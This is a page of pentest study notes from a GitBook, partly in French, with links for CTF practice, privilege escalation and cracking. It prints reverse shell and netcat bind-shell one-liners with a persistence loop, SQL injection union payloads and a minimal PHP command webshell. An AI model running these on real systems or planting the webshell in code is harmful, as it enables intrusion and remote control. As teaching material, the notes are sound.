pentest-book
  • Welcome
  • Cybersecurity Lecture notes
  • Exploit management
  • Recon
    • Public info gathering
    • Root domains
    • Subdomain Enum
      • Subdomain Takeover
    • Webs recon
    • Network Scanning
    • Host Scanning
    • Packet Scanning
  • Enumeration
    • Files
    • SSL/TLS
    • Ports
    • Web Attacks
      • General Info
      • Quick tricks
      • Header injections
      • Bruteforcing
      • Online hashes cracked
      • Crawl/Fuzz
      • LFI/RFI
      • File upload
      • SQLi
      • SSRF
      • Open redirects
      • XSS
      • CSP
      • XXE
      • Cookie Padding
      • Webshells
      • CORS
      • CSRF
      • Web Cache Poisoning
      • Broken Links
      • Clickjacking
      • HTTP Request Smuggling
      • Web Sockets
      • CRLF
      • IDOR
      • Web Cache Deception
      • Session fixation
      • Email attacks
      • Pastejacking
      • HTTP Parameter pollution
      • SSTI
      • Prototype Pollution
      • Command Injection
      • Deserialization
      • DNS rebinding
    • Web Technologies
      • APIs
      • JS
      • ASP.NET
      • JWT
      • GitHub
      • GitLab
      • WAFs
      • Firebird
      • Wordpress
      • WebDav
      • Joomla
      • Jenkins
      • IIS
      • VHosts
      • Firebase
      • OWA
      • OAuth
      • Flask
      • Symfony && Twig
      • Drupal
      • NoSQL (MongoDB, CouchDB)
      • PHP
      • RoR (Ruby on Rails)
      • JBoss - Java Deserialization
      • OneLogin - SAML Login
      • Flash SWF
      • Nginx
      • Python
      • Tomcat
      • Adobe AEM
      • Magento
      • SAP
      • MFA
      • GWT
      • Jira
      • OIDC (Open ID Connect)
      • ELK
      • Sharepoint
      • Others
    • Cloud
      • General
      • Cloud Info Gathering
      • AWS
      • Azure
      • GCP
      • Docker && Kubernetes
      • CDN - Comain Fronting
  • Exploitation
    • Payloads
    • Reverse Shells
    • File transfer
  • Post Exploitation
    • Linux
    • Pivoting
    • Windows
      • AD
        • Kerberos
      • PS tips & tricks
  • Mobile
    • General
    • Android
    • iOS
  • Others
    • Burp Suite
    • Password cracking
    • VirtualBox
    • Code review
    • Pentesting Web checklist
    • Internal Pentest
    • Web fuzzers review
    • Recon suites review
    • Subdomain tools review
    • Random
    • Master assessment mindmaps
    • BugBounty
    • Exploiting
    • tools everywhere
Powered by GitBook
On this page
  • Interesting links
  • PrivESC
  • Reserve shell
  • Steganography
  • Tools
  • how to crack a password
  • Reverse/bind shell
  • SQL exemples Payloads
  • PHP the most simple webshell
  • Challenges
  • ETAPE 1
  • ETPAE 2
  • ETAPE 3
  • String to decode
  • Wifi challenge
Edit on GitHub

Cybersecurity Lecture notes

PreviousWelcomeNextExploit management

Last updated 1 year ago

This file list interesting link related to computer security (tools, info, tuto, interesting sites, ressources)

Interesting links

PrivESC

Reserve shell

Steganography

Tools

how to crack a password

  1. Identify the type of hash

  • https://hashes.com/en/tools/hash_identifier

  1. Use john the ripper (already installed on kali)

  • https://fr.wikipedia.org/wiki/John_the_Ripper

  • https://myhackingworld.com/crack-passwords-with-john-the-ripper/

  1. Use a custom wordlist on john the ripper

  • https://gitlab.com/kalilinux/packages/wordlists/blob/kali/master/rockyou.txt.gz

Reverse/bind shell

#Reverse Shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");’
socat file:`tty`,raw,echo=0 TCP-L:port
Bind shell
nc –lvp 4444 –e /bin/bash

#Add a bit of persistence:
while true; do nc –lvp 4444 –e /bin/bash; done

SQL exemples Payloads

https://portswigger.net/web-security/sql-injection/cheat-sheet

user"; --
user" union select 1,2,3,4,@@version; --
user" union select 1,2,3,4,group_concat(schema_name) from information_schema.schemata; --

PHP the most simple webshell

<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }

//Pour aller plus loin : https://github.com/flozz/p0wny-shell
?>

Challenges

ETAPE 1

ETPAE 2

ETAPE 3

String to decode

427261766f207475206120726575737369206c6520636816c6c656e6765

aidhaSBwZXJkdQ==

26237834373b26237834373b26237832303b26237832313b26237832303b26237837343b26237837353b26237832303b26237836313b26237832303b26237837323b26237836353b26237837353b26237837333b26237837333b26237836393b

Wifi challenge

WEP - https://ufile.io/h28b15y2

WPA2 - https://ufile.io/3qfmvxzn

-> Astuce : dirb/mutations_common

RootMe
HackTheBox
Podcast le comptoirsecu
PayloadsAllTheThings
Collection of BURP payloads
Windows Privilege Escalation CheatCheet
Linux Privilege Escalation Binary
LinEnum
Unix privesc
Linprivchecker
Monitor linux process
Ngrok : Exspose ports to Internet
Plink ssh tunnels on windows
Aperi'Solve performs layer analysis on image
CyberChef : Encode and decode data
Download KALI linux live 2020.4
HTTP - Headers
HTTP - User-agent
Fichiers de sauvegarde
Path traversal
File-upload-double-extensions
File Upload type MIME
XSS Injection
SQL injection - Authentification
Injection (SQL blind)
Injection (SQL String)